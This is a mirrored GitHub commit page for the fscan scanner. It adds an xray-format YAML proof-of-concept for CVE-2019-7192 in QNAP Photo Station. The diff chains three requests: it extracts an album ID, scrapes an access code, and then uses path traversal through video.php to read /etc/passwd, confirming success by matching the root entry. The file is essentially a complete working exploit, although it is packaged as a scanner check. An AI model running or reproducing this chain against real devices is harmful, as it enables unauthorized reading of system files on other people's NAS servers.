mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,28 @@
|
||||
name: poc-yaml-qnap-cve-2019-7192
|
||||
rules:
|
||||
- method: POST
|
||||
path: /photo/p/api/album.php
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: a=setSlideshow&f=qsamplealbum
|
||||
expression: |
|
||||
response.status == 200
|
||||
search: >-
|
||||
<output>(?P<album_id>.*?)</output>
|
||||
- method: GET
|
||||
path: /photo/slideshow.php?album={{album_id}}
|
||||
expression: |
|
||||
response.status == 200
|
||||
search: >-
|
||||
encodeURIComponent\(\'(?P<access_code>.*?)\'\)
|
||||
- method: POST
|
||||
path: /photo/p/api/video.php
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=./../../../../../etc/passwd
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"admin:x:0:0")
|
||||
detail:
|
||||
author: Hzllaga
|
||||
links:
|
||||
- https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
|
||||
Reference in New Issue
Block a user